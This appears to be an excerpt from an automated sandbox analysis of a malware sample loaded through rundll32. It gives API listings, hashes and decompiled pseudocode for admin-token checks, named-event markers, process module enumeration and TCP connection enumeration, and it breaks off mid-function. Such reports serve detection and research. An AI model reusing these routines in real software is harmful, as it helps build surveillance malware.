                                                                                              0x0426b6fc
                                                                                              0x0426b6fc
                                                                                              0x0426b705
                                                                                              0x0426b715
                                                                                              0x0426b715
                                                                                              0x0426b717
                                                                                              0x0426b717
                                                                                              0x0426b721
                                                                                              0x0426b723
                                                                                              0x0426b72a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426b730
                                                                                              0x0426b734
                                                                                              0x0426b736
                                                                                              0x0426b73a
                                                                                              0x0426b73f
                                                                                              0x0426b744
                                                                                              0x0426b747
                                                                                              0x0426b74c
                                                                                              0x0426b74c
                                                                                              0x0426b74f
                                                                                              0x0426b756
                                                                                              0x0426b75d
                                                                                              0x0426b764
                                                                                              0x0426b76b
                                                                                              0x0426b772
                                                                                              0x0426b777
                                                                                              0x0426b77a
                                                                                              0x0426b77f
                                                                                              0x0426b77f
                                                                                              0x0426b782
                                                                                              0x0426b785
                                                                                              0x0426b78a
                                                                                              0x0426b78d
                                                                                              0x0426b78f
                                                                                              0x0426b78f
                                                                                              0x0426b795
                                                                                              0x0426b79d
                                                                                              0x0426b79f
                                                                                              0x0426b79f
                                                                                              0x0426b7a3
                                                                                              0x0426b7de
                                                                                              0x0426b7e3
                                                                                              0x00000000
                                                                                              0x0426b7a5
                                                                                              0x0426b7a5
                                                                                              0x0426b7a7
                                                                                              0x0426b7b0
                                                                                              0x0426b7b0
                                                                                              0x0426b7b5
                                                                                              0x0426b7b8
                                                                                              0x0426b7c0
                                                                                              0x0426b7e6
                                                                                              0x0426b7e6
                                                                                              0x0426b7e8
                                                                                              0x0426b7f0
                                                                                              0x0426b7f0
                                                                                              0x0426b7f9
                                                                                              0x0426b7fc
                                                                                              0x0426b800
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426b806
                                                                                              0x0426b80a
                                                                                              0x0426b812
                                                                                              0x0426b816
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426b826
                                                                                              0x0426b82b
                                                                                              0x0426b831
                                                                                              0x0426b836
                                                                                              0x0426b83f
                                                                                              0x0426b846
                                                                                              0x0426b84d
                                                                                              0x0426b854
                                                                                              0x0426b85b
                                                                                              0x0426b862
                                                                                              0x0426b86a
                                                                                              0x0426b871
                                                                                              0x0426b878
                                                                                              0x0426b87f
                                                                                              0x0426b886
                                                                                              0x0426b88a
                                                                                              0x0426b88f
                                                                                              0x0426b899
                                                                                              0x0426b89c
                                                                                              0x0426b8a8
                                                                                              0x0426b8a9
                                                                                              0x0426b8ac
                                                                                              0x0426b8b1
                                                                                              0x0426b8b3
                                                                                              0x0426b9c6
                                                                                              0x0426b9c6
                                                                                              0x00000000
                                                                                              0x0426b9c6
                                                                                              0x0426b8c6
                                                                                              0x0426b8cf
                                                                                              0x0426b8d1
                                                                                              0x0426b8da
                                                                                              0x0426b8ea
                                                                                              0x0426b8ee
                                                                                              0x0426b8f4
                                                                                              0x0426b8f7
                                                                                              0x0426b900
                                                                                              0x0426b90b
                                                                                              0x0426b90e
                                                                                              0x0426b915
                                                                                              0x0426b91c
                                                                                              0x0426b92f
                                                                                              0x0426b935
                                                                                              0x0426b93a
                                                                                              0x0426b941
                                                                                              0x0426b945
                                                                                              0x0426b94f
                                                                                              0x0426b959
                                                                                              0x0426b960
                                                                                              0x0426b963
                                                                                              0x0426b965
                                                                                              0x0426b969
                                                                                              0x0426b96e
                                                                                              0x0426b978
                                                                                              0x0426b978
                                                                                              0x0426b984
                                                                                              0x0426b995
                                                                                              0x0426b99a
                                                                                              0x0426b99f
                                                                                              0x00000000
                                                                                              0x0426b9a1
                                                                                              0x0426b9a1
                                                                                              0x0426b9a3
                                                                                              0x0426b9b1
                                                                                              0x0426b9b7
                                                                                              0x0426b9bb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426b9c4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426b9c4
                                                                                              0x0426ba02
                                                                                              0x0426ba04
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426ba06
                                                                                              0x0426ba08
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426ba0a
                                                                                              0x0426ba0f
                                                                                              0x0426ba17
                                                                                              0x0426ba19
                                                                                              0x0426ba1d
                                                                                              0x0426ba22
                                                                                              0x0426ba25
                                                                                              0x0426ba27
                                                                                              0x0426ba2c
                                                                                              0x0426ba2c
                                                                                              0x0426ba34
                                                                                              0x0426ba38
                                                                                              0x0426ba3d
                                                                                              0x0426ba4b
                                                                                              0x0426ba4d
                                                                                              0x0426ba4e
                                                                                              0x0426ba60
                                                                                              0x0426ba6f
                                                                                              0x0426ba75
                                                                                              0x0426ba79
                                                                                              0x0426ba7d
                                                                                              0x0426ba80
                                                                                              0x0426ba92
                                                                                              0x0426ba92
                                                                                              0x0426ba95
                                                                                              0x0426bac1
                                                                                              0x0426bac1
                                                                                              0x0426bac7
                                                                                              0x0426bacb
                                                                                              0x0426bad3
                                                                                              0x0426bad5
                                                                                              0x0426bb1c
                                                                                              0x0426bb1c
                                                                                              0x0426bb22
                                                                                              0x0426bb24
                                                                                              0x0426bb26
                                                                                              0x0426bb29
                                                                                              0x0426bb2d
                                                                                              0x0426bb30
                                                                                              0x0426bb34
                                                                                              0x0426bb39
                                                                                              0x0426bb39
                                                                                              0x0426bb2d
                                                                                              0x0426bb43
                                                                                              0x0426bb47
                                                                                              0x0426bb49
                                                                                              0x00000000
                                                                                              0x0426bb4f
                                                                                              0x0426bb4f
                                                                                              0x0426bb52
                                                                                              0x0426bb59
                                                                                              0x0426bb5b
                                                                                              0x0426bb67
                                                                                              0x0426bb69
                                                                                              0x0426bb6c
                                                                                              0x0426bb73
                                                                                              0x0426bb77
                                                                                              0x0426bb7d
                                                                                              0x0426bb81
                                                                                              0x0426bb83
                                                                                              0x0426bb86
                                                                                              0x0426bb86
                                                                                              0x0426bb99
                                                                                              0x0426bba5
                                                                                              0x0426bbaf
                                                                                              0x0426bbaf
                                                                                              0x0426bb5d
                                                                                              0x0426bb60
                                                                                              0x0426bb62
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426bb64
                                                                                              0x0426bb64
                                                                                              0x00000000
                                                                                              0x0426bb64
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426bad7
                                                                                              0x0426bad7
                                                                                              0x0426badc
                                                                                              0x0426baea
                                                                                              0x0426baf0
                                                                                              0x0426baf2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426baf8
                                                                                              0x0426baf9
                                                                                              0x0426bafd
                                                                                              0x0426bb01
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426bb03
                                                                                              0x0426bb06
                                                                                              0x0426bb16
                                                                                              0x00000000
                                                                                              0x0426bb16
                                                                                              0x0426ba97
                                                                                              0x0426ba9a
                                                                                              0x0426ba9c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426baa4
                                                                                              0x0426baa7
                                                                                              0x0426baa9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426baab
                                                                                              0x0426baaf
                                                                                              0x0426baaf
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426baaf
                                                                                              0x0426ba82
                                                                                              0x0426ba85
                                                                                              0x0426ba87
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426ba8e
                                                                                              0x00000000
                                                                                              0x0426bab1
                                                                                              0x0426bab6
                                                                                              0x0426bab8
                                                                                              0x0426bab8
                                                                                              0x00000000
                                                                                              0x0426babf
                                                                                              0x0426b9ca
                                                                                              0x0426b9ca
                                                                                              0x0426b9cb
                                                                                              0x0426b9cf
                                                                                              0x0426b7f0
                                                                                              0x0426b9e4
                                                                                              0x0426b9e6
                                                                                              0x0426b9ea
                                                                                              0x00000000
                                                                                              0x0426b734
                                                                                              0x0426b9f2
                                                                                              0x0426b9f7
                                                                                              0x00000000
                                                                                              0x0426b9f7

                                                                                              APIs
                                                                                                • Part of subcall function 0426ABF0: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0426AC2E
                                                                                                • Part of subcall function 0426ABF0: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0426AC41
                                                                                                • Part of subcall function 0426ABF0: FreeSid.ADVAPI32(?), ref: 0426AC4A
                                                                                                • Part of subcall function 04269390: wsprintfW.USER32 ref: 042693CE
                                                                                                • Part of subcall function 04269390: CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 042693E0
                                                                                                • Part of subcall function 04269390: GetLastError.KERNEL32 ref: 042693F1
                                                                                                • Part of subcall function 04269390: CloseHandle.KERNEL32(?), ref: 04269401
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0426B64E
                                                                                              • GetTickCount.KERNEL32 ref: 0426B65A
                                                                                              • GetTickCount.KERNEL32 ref: 0426B65D
                                                                                              • wsprintfA.USER32 ref: 0426B66D
                                                                                              • CreateThread.KERNEL32(00000000,00000000,0426C0A0,00000000,00000000,00000000), ref: 0426B695
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0426B698
                                                                                              • CreateThread.KERNEL32(00000000,00000000,0425E6E0,00000000,00000000,00000000), ref: 0426B6B2
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0426B6B5
                                                                                              • GetTickCount.KERNEL32 ref: 0426B88F
                                                                                              • GetTickCount.KERNEL32 ref: 0426B8B9
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0426B8FA
                                                                                              • lstrcpy.KERNEL32(0000000C,?), ref: 0426B91C
                                                                                              • lstrcpyW.KERNEL32(042A78D8,?), ref: 0426B92F
                                                                                              • Sleep.KERNEL32(000003E8), ref: 0426B9B1
                                                                                              • Sleep.KERNEL32(00002710,Control), ref: 0426B9F7
                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,?,?,00000005,0000003F), ref: 0426BA6F
                                                                                              • Sleep.KERNEL32(000001F4), ref: 0426BAB6
                                                                                              • Sleep.KERNEL32(000003E8), ref: 0426BADC
                                                                                              • OpenEventA.KERNEL32(001F0003,00000001,Global\CONN0000000000), ref: 0426BAEA
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0426BB06
                                                                                              • lstrcpyW.KERNEL32(042A64A4,[CONN]), ref: 0426BB16
                                                                                              • CloseHandle.KERNEL32(?), ref: 0426BB73
                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 0426BB77
                                                                                              • CloseHandle.KERNEL32(?), ref: 0426BB86
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0426BB93
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$CountCreateEventSleepTick$Errorlstrcpy$ModeOpenThreadwsprintf$AllocateCheckFreeInitializeLastMembershipToken
                                                                                              • String ID: 20220829$Control$Global\%d%d$Global\CONN0000000000$[CONN]$v20220829
                                                                                              • API String ID: 2334699370-1326833230
                                                                                              • Opcode ID: 29ec230e6afc6d2dd7570f5f0139ef4f06737cd388d29f275be4bda9b50515b7
                                                                                              • Instruction ID: 66b66a6a275272576f4ee64441afe4b2f6649c014167f77ecb79cf885838c010
                                                                                              • Opcode Fuzzy Hash: 29ec230e6afc6d2dd7570f5f0139ef4f06737cd388d29f275be4bda9b50515b7
                                                                                              • Instruction Fuzzy Hash: 81F1B271714352AFE724EF24D888B6ABBE4FF44704F040529E946DB280EB74F985CB96
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 87%
                                                                                              			E04264850(void* __ecx, void* __eflags, WCHAR* _a4) {
                                                                                              				void* _v8;
                                                                                              				long _v12;
                                                                                              				WCHAR* _v16;
                                                                                              				WCHAR* _v20;
                                                                                              				WCHAR* _v24;
                                                                                              				WCHAR* _v28;
                                                                                              				struct tagPROCESSENTRY32W _v32;
                                                                                              				void* _v36;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				WCHAR* _t105;
                                                                                              				WCHAR* _t106;
                                                                                              				WCHAR* _t107;
                                                                                              				WCHAR* _t108;
                                                                                              				struct tagPROCESSENTRY32W _t110;
                                                                                              				int _t126;
                                                                                              				int _t127;
                                                                                              				int _t128;
                                                                                              				int _t129;
                                                                                              				int _t130;
                                                                                              				signed short* _t178;
                                                                                              				signed int _t179;
                                                                                              				signed int _t185;
                                                                                              				WCHAR* _t186;
                                                                                              				void* _t187;
                                                                                              				void* _t188;
                                                                                              				WCHAR* _t189;
                                                                                              				void* _t192;
                                                                                              				signed int _t195;
                                                                                              				WCHAR* _t196;
                                                                                              				WCHAR* _t197;
                                                                                              				intOrPtr* _t198;
                                                                                              				struct tagPROCESSENTRY32W _t201;
                                                                                              				void* _t203;
                                                                                              				void* _t205;
                                                                                              				void* _t207;
                                                                                              				struct tagPROCESSENTRY32W _t208;
                                                                                              				WCHAR* _t209;
                                                                                              				void* _t210;
                                                                                              				long _t218;
                                                                                              				long _t219;
                                                                                              				void* _t222;
                                                                                              				void* _t224;
                                                                                              				void* _t226;
                                                                                              				void* _t228;
                                                                                              				void* _t230;
                                                                                              				void* _t231;
                                                                                              				void* _t233;
                                                                                              				void* _t239;
                                                                                              
                                                                                              				_t239 = __eflags;
                                                                                              				_t187 = __ecx;
                                                                                              				_t210 = LocalAlloc(0x40, 0x400);
                                                                                              				_v12 = 1;
                                                                                              				_push(0x208);
                                                                                              				_v8 = _t210;
                                                                                              				 *_t210 = 0x81;
                                                                                              				_t105 = E04275B55(_t187, _t210, _t239);
                                                                                              				_push(0x208);
                                                                                              				_t186 = _t105;
                                                                                              				_t106 = E04275B55(_t187, _t210, _t239);
                                                                                              				_push(0x208);
                                                                                              				_v16 = _t106;
                                                                                              				_t107 = E04275B55(_t187, _t210, _t239);
                                                                                              				_push(0x208);
                                                                                              				_v20 = _t107;
                                                                                              				_t108 = E04275B55(_t187, _t210, _t239);
                                                                                              				_push(0x28);
                                                                                              				_v24 = _t108;
                                                                                              				_v28 = E04275B55(_t187, _t210, _t239);
                                                                                              				_t110 = E04275B14(_t210, _t239, 0x428);
                                                                                              				_t231 = _t230 + 0x18;
                                                                                              				_t208 = _t110;
                                                                                              				_v32 = _t208;
                                                                                              				 *_t208 = 0x428;
                                                                                              				_t188 = CreateToolhelp32Snapshot(0x18, _a4);
                                                                                              				_v36 = _t188;
                                                                                              				if(_t188 != 0xffffffff) {
                                                                                              					if(Module32FirstW(_t188, _t208) != 0) {
                                                                                              						_t10 = _t208 + 0x20; // 0x20
                                                                                              						_t209 = _t208 + 0x220;
                                                                                              						_a4 = _t10;
                                                                                              						do {
                                                                                              							if( *_t209 != 0x3f005c || _t209[2] != 0x5c003f) {
                                                                                              								_t189 = _t209;
                                                                                              								_t198 = L"\\SystemRoot";
                                                                                              								_t210 = 0x12;
                                                                                              								while(1) {
                                                                                              									__eflags =  *_t189 -  *_t198;
                                                                                              									if( *_t189 !=  *_t198) {
                                                                                              										goto L16;
                                                                                              									}
                                                                                              									_t189 =  &(_t189[2]);
                                                                                              									_t198 = _t198 + 4;
                                                                                              									_t210 = _t210 - 4;
                                                                                              									__eflags = _t210;
                                                                                              									if(_t210 >= 0) {
                                                                                              										continue;
                                                                                              									} else {
                                                                                              										__eflags =  *_t189 -  *_t198;
                                                                                              										if( *_t189 ==  *_t198) {
                                                                                              											wsprintfW(_t186, L"C:\\WINDOWS%s", _v32 + 0x24c);
                                                                                              											_t231 = _t231 + 0xc;
                                                                                              											_t197 = _t186;
                                                                                              											_t207 = _t209 - _t186;
                                                                                              											asm("o16 nop [eax+eax]");
                                                                                              											do {
                                                                                              												_t185 =  *_t197 & 0x0000ffff;
                                                                                              												_t197 =  &(_t197[1]);
                                                                                              												 *(_t207 + _t197 - 2) = _t185;
                                                                                              												__eflags = _t185;
                                                                                              											} while (_t185 != 0);
                                                                                              										}
                                                                                              									}
                                                                                              									goto L16;
                                                                                              								}
                                                                                              							} else {
                                                                                              								_t178 = _v32 + 0x230;
                                                                                              								_t203 = _t186 - _t178;
                                                                                              								do {
                                                                                              									_t195 =  *_t178 & 0x0000ffff;
                                                                                              									_t178 =  &(_t178[1]);
                                                                                              									 *(_t203 + _t178 - 2) = _t195;
                                                                                              								} while (_t195 != 0);
                                                                                              								_t196 = _t186;
                                                                                              								_t205 = _t209 - _t186;
                                                                                              								asm("o16 nop [eax+eax]");
                                                                                              								do {
                                                                                              									_t179 =  *_t196 & 0x0000ffff;
                                                                                              									_t196 =  &(_t196[1]);
                                                                                              									 *(_t205 + _t196 - 2) = _t179;
                                                                                              								} while (_t179 != 0);
                                                                                              							}
                                                                                              							L16:
                                                                                              							E04265DD0(_t186, _t209, _v16, _t209, _t210, _v20, _v24);
                                                                                              							asm("xorps xmm0, xmm0");
                                                                                              							_t233 = _t231 + 8;
                                                                                              							asm("movups [eax], xmm0");
                                                                                              							asm("movups [eax+0x10], xmm0");
                                                                                              							asm("movq [eax+0x20], xmm0");
                                                                                              							E04264790(_t209, _v28, _t210);
                                                                                              							_t126 = lstrlenW(_t209);
                                                                                              							_t127 = lstrlenW(_v28);
                                                                                              							_t128 = lstrlenW(_v24);
                                                                                              							_t129 = lstrlenW(_v20);
                                                                                              							_t130 = lstrlenW(_v16);
                                                                                              							_t218 = _t126 + _t127 + _t128 + _t129 + _t130 + lstrlenW(_a4) + _t126 + _t127 + _t128 + _t129 + _t130 + lstrlenW(_a4) + _v12 + 0x14;
                                                                                              							if(LocalSize(_v8) >= _t218) {
                                                                                              								_t192 = _v8;
                                                                                              							} else {
                                                                                              								_t192 = LocalReAlloc(_v8, _t218, 0x42);
                                                                                              								_v8 = _t192;
                                                                                              							}
                                                                                              							_t201 = _v32;
                                                                                              							_t219 = _v12;
                                                                                              							 *((intOrPtr*)(_t219 + _t192)) =  *((intOrPtr*)(_t201 + 0x14));
                                                                                              							 *((intOrPtr*)(_t219 + _t192 + 4)) =  *((intOrPtr*)(_t201 + 0x18));
                                                                                              							_v12 = _t219 + 8;
                                                                                              							E0427E060(_v8 + _v12, _a4, 2 + lstrlenW(_t201 + 0x20) * 2);
                                                                                              							_t222 = _v12 + 2 + lstrlenW(_a4) * 2;
                                                                                              							E0427E060(_v8 + _t222, _t209, 2 + lstrlenW(_t209) * 2);
                                                                                              							_t224 = _t222 + lstrlenW(_t209) * 2 + 2;
                                                                                              							E0427E060(_v8 + _t224, _v16, 2 + lstrlenW(_v16) * 2);
                                                                                              							_t226 = _t224 + lstrlenW(_v16) * 2 + 2;
                                                                                              							E0427E060(_v8 + _t226, _v20, 2 + lstrlenW(_v20) * 2);
                                                                                              							_t228 = _t226 + lstrlenW(_v20) * 2 + 2;
                                                                                              							E0427E060(_v8 + _t228, _v24, 2 + lstrlenW(_v24) * 2);
                                                                                              							_t210 = _t228 + lstrlenW(_v24) * 2 + 2;
                                                                                              							E0427E060(_v8 + _t210, _v28, 2 + lstrlenW(_v28) * 2);
                                                                                              							_t231 = _t233 + 0x48;
                                                                                              							_v12 = _t210 + (lstrlenW(_v28) + 1) * 2;
                                                                                              						} while (Module32NextW(_v36, _v32) != 0);
                                                                                              						_t210 = _v8;
                                                                                              						_t208 = _v32;
                                                                                              					}
                                                                                              					CloseHandle(_v36);
                                                                                              				}
                                                                                              				E04275B0F(_t186);
                                                                                              				E04275B0F(_v16);
                                                                                              				E04275B0F(_v20);
                                                                                              				E04275B0F(_v24);
                                                                                              				E04275B0F(_v28);
                                                                                              				_push(0x428);
                                                                                              				E04275B47(_t208);
                                                                                              				return LocalReAlloc(_t210, _v12, 0x42);
                                                                                              			}





















































                                                                                              0x04264850
                                                                                              0x04264850
                                                                                              0x04264866
                                                                                              0x04264868
                                                                                              0x0426486f
                                                                                              0x04264874
                                                                                              0x04264877
                                                                                              0x0426487a
                                                                                              0x0426487f
                                                                                              0x04264884
                                                                                              0x04264886
                                                                                              0x0426488b
                                                                                              0x04264890
                                                                                              0x04264893
                                                                                              0x04264898
                                                                                              0x0426489d
                                                                                              0x042648a0
                                                                                              0x042648a5
                                                                                              0x042648a7
                                                                                              0x042648b4
                                                                                              0x042648b7
                                                                                              0x042648bc
                                                                                              0x042648bf
                                                                                              0x042648c1
                                                                                              0x042648c7
                                                                                              0x042648d5
                                                                                              0x042648d7
                                                                                              0x042648dd
                                                                                              0x042648ed
                                                                                              0x042648f3
                                                                                              0x042648f6
                                                                                              0x042648fc
                                                                                              0x04264900
                                                                                              0x04264906
                                                                                              0x04264952
                                                                                              0x04264954
                                                                                              0x04264959
                                                                                              0x04264960
                                                                                              0x04264962
                                                                                              0x04264964
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04264966
                                                                                              0x04264969
                                                                                              0x0426496c
                                                                                              0x0426496c
                                                                                              0x0426496f
                                                                                              0x00000000
                                                                                              0x04264971
                                                                                              0x04264974
                                                                                              0x04264977
                                                                                              0x04264988
                                                                                              0x04264990
                                                                                              0x04264993
                                                                                              0x04264995
                                                                                              0x04264997
                                                                                              0x042649a0
                                                                                              0x042649a0
                                                                                              0x042649a3
                                                                                              0x042649a6
                                                                                              0x042649ab
                                                                                              0x042649ab
                                                                                              0x042649a0
                                                                                              0x04264977
                                                                                              0x00000000
                                                                                              0x0426496f
                                                                                              0x04264911
                                                                                              0x04264916
                                                                                              0x0426491b
                                                                                              0x04264920
                                                                                              0x04264920
                                                                                              0x04264923
                                                                                              0x04264926
                                                                                              0x0426492b
                                                                                              0x04264932
                                                                                              0x04264934
                                                                                              0x04264936
                                                                                              0x04264940
                                                                                              0x04264940
                                                                                              0x04264943
                                                                                              0x04264946
                                                                                              0x0426494b
                                                                                              0x04264950
                                                                                              0x042649b0
                                                                                              0x042649bb
                                                                                              0x042649c3
                                                                                              0x042649c6
                                                                                              0x042649cd
                                                                                              0x042649d0
                                                                                              0x042649d4
                                                                                              0x042649d9
                                                                                              0x042649df
                                                                                              0x042649ea
                                                                                              0x042649f5
                                                                                              0x04264a00
                                                                                              0x04264a0b
                                                                                              0x04264a29
                                                                                              0x04264a33
                                                                                              0x04264a48
                                                                                              0x04264a35
                                                                                              0x04264a41
                                                                                              0x04264a43
                                                                                              0x04264a43
                                                                                              0x04264a4b
                                                                                              0x04264a4e
                                                                                              0x04264a54
                                                                                              0x04264a5a
                                                                                              0x04264a64
                                                                                              0x04264a82
                                                                                              0x04264a96
                                                                                              0x04264aae
                                                                                              0x04264ac3
                                                                                              0x04264add
                                                                                              0x04264af4
                                                                                              0x04264b0e
                                                                                              0x04264b25
                                                                                              0x04264b3f
                                                                                              0x04264b53
                                                                                              0x04264b70
                                                                                              0x04264b75
                                                                                              0x04264b8b
                                                                                              0x04264b94
                                                                                              0x04264b9c
                                                                                              0x04264b9f
                                                                                              0x04264b9f
                                                                                              0x04264ba5
                                                                                              0x04264ba5
                                                                                              0x04264bac
                                                                                              0x04264bb4
                                                                                              0x04264bbc
                                                                                              0x04264bc4
                                                                                              0x04264bcc
                                                                                              0x04264bd1
                                                                                              0x04264bd7
                                                                                              0x04264bf1

                                                                                              APIs
                                                                                              • LocalAlloc.KERNEL32(00000040,00000400), ref: 04264860
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000018,00000001), ref: 042648CF
                                                                                              • Module32FirstW.KERNEL32(00000000,00000000), ref: 042648E5
                                                                                              • wsprintfW.USER32 ref: 04264988
                                                                                              • lstrlenW.KERNEL32(-00000220), ref: 042649DF
                                                                                              • lstrlenW.KERNEL32(?), ref: 042649EA
                                                                                              • lstrlenW.KERNEL32(?), ref: 042649F5
                                                                                              • lstrlenW.KERNEL32(?), ref: 04264A00
                                                                                              • lstrlenW.KERNEL32(?), ref: 04264A0B
                                                                                              • lstrlenW.KERNEL32(00000001), ref: 04264A16
                                                                                              • LocalSize.KERNEL32(?), ref: 04264A2B
                                                                                              • LocalReAlloc.KERNEL32(?,00000000,00000042), ref: 04264A3B
                                                                                              • lstrlenW.KERNEL32(?), ref: 04264A6E
                                                                                              • lstrlenW.KERNEL32(00000001), ref: 04264A8D
                                                                                              • lstrlenW.KERNEL32(-00000220), ref: 04264A99
                                                                                              • lstrlenW.KERNEL32(-00000220), ref: 04264AB7
                                                                                              • lstrlenW.KERNEL32(?), ref: 04264AC6
                                                                                              • lstrlenW.KERNEL32(?), ref: 04264AE8
                                                                                              • lstrlenW.KERNEL32(?), ref: 04264AF7
                                                                                              • lstrlenW.KERNEL32(?), ref: 04264B19
                                                                                              • lstrlenW.KERNEL32(?), ref: 04264B28
                                                                                              • lstrlenW.KERNEL32(?), ref: 04264B4A
                                                                                              • lstrlenW.KERNEL32(?), ref: 04264B59
                                                                                              • lstrlenW.KERNEL32(?), ref: 04264B7B
                                                                                              • Module32NextW.KERNEL32(?,?), ref: 04264B8E
                                                                                              • CloseHandle.KERNEL32(?), ref: 04264BA5
                                                                                              • LocalReAlloc.KERNEL32(00000000,00000001,00000042), ref: 04264BE5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: lstrlen$Local$Alloc$Module32$CloseCreateFirstHandleNextSizeSnapshotToolhelp32wsprintf
                                                                                              • String ID: C:\WINDOWS%s$\SystemRoot
                                                                                              • API String ID: 671652143-1245600093
                                                                                              • Opcode ID: 81f1ca7982f46fb37599be8124e0444dc2cff98250fc31c7449a398e02c91862
                                                                                              • Instruction ID: a0568758a77c3e5c275036f5b9288144be322842393feec997f0ee649ed9cd0e
                                                                                              • Opcode Fuzzy Hash: 81f1ca7982f46fb37599be8124e0444dc2cff98250fc31c7449a398e02c91862
                                                                                              • Instruction Fuzzy Hash: 7CB18D71F10119EBCF10AFA8EC48AAEBBB4FF44309F544068F909A3251DB35AD52CB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 65%
                                                                                              			E0425D570(void* __edi, void* __esi) {
                                                                                              				intOrPtr _v8;
                                                                                              				signed int _v16;
                                                                                              				short _v540;
                                                                                              				void* _v544;
                                                                                              				void* _v548;
                                                                                              				void* _v552;
                                                                                              				long _v556;
                                                                                              				signed int* _v560;
                                                                                              				intOrPtr _v576;
                                                                                              				intOrPtr _v580;
                                                                                              				intOrPtr _v584;
                                                                                              				intOrPtr _v588;
                                                                                              				_Unknown_base(*)() _v592;
                                                                                              				intOrPtr _v596;
                                                                                              				intOrPtr _v600;
                                                                                              				void* _v604;
                                                                                              				signed int _t97;
                                                                                              				_Unknown_base(*)()* _t102;
                                                                                              				signed int _t108;
                                                                                              				void* _t109;
                                                                                              				void* _t111;
                                                                                              				int _t125;
                                                                                              				signed int _t133;
                                                                                              				void* _t135;
                                                                                              				void* _t137;
                                                                                              				void* _t143;
                                                                                              				signed int* _t144;
                                                                                              				signed int* _t148;
                                                                                              				int _t161;
                                                                                              				signed int _t169;
                                                                                              				signed int* _t178;
                                                                                              				intOrPtr _t179;
                                                                                              				long _t180;
                                                                                              				_Unknown_base(*)()* _t184;
                                                                                              				intOrPtr _t185;
                                                                                              				long _t186;
                                                                                              				intOrPtr _t188;
                                                                                              				intOrPtr _t193;
                                                                                              				struct HINSTANCE__* _t195;
                                                                                              				signed int _t197;
                                                                                              				void* _t199;
                                                                                              				signed int* _t201;
                                                                                              				void* _t202;
                                                                                              				long _t204;
                                                                                              				void* _t208;
                                                                                              				void* _t211;
                                                                                              				signed int _t215;
                                                                                              				void* _t219;
                                                                                              				signed int _t222;
                                                                                              				void* _t223;
                                                                                              				void* _t228;
                                                                                              				void* _t231;
                                                                                              				void* _t233;
                                                                                              
                                                                                              				_t222 = (_t219 - 0x00000008 & 0xfffffff0) + 4;
                                                                                              				_v8 =  *((intOrPtr*)(_t219 + 4));
                                                                                              				_t215 = _t222;
                                                                                              				_t223 = _t222 - 0x258;
                                                                                              				_t97 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v16 = _t97 ^ _t215;
                                                                                              				_push(__esi);
                                                                                              				_t204 = 0;
                                                                                              				_t195 = LoadLibraryA("iphlpapi.dll");
                                                                                              				if(_t195 == 0) {
                                                                                              					L5:
                                                                                              					return E04275AFE(_v16 ^ _t215);
                                                                                              				} else {
                                                                                              					_v604 = 0;
                                                                                              					_v600 = 1;
                                                                                              					_t102 = GetProcAddress(_t195, "GetExtendedTcpTable");
                                                                                              					_v548 = _t102;
                                                                                              					if(_t102 == 0) {
                                                                                              						_t197 = GetProcAddress(_t195, "AllocateAndGetTcpExTableFromStack");
                                                                                              						__eflags = _t197;
                                                                                              						if(_t197 == 0) {
                                                                                              							__eflags = 0;
                                                                                              							goto L24;
                                                                                              						} else {
                                                                                              							_v544 = 0;
                                                                                              							_t108 =  *_t197( &_v544, 1, GetProcessHeap(), 0, 2);
                                                                                              							__eflags = _t108;
                                                                                              							if(_t108 == 0) {
                                                                                              								_t109 = LocalAlloc(0x40, 0x2800);
                                                                                              								_t178 = _v544;
                                                                                              								_t199 = _t109;
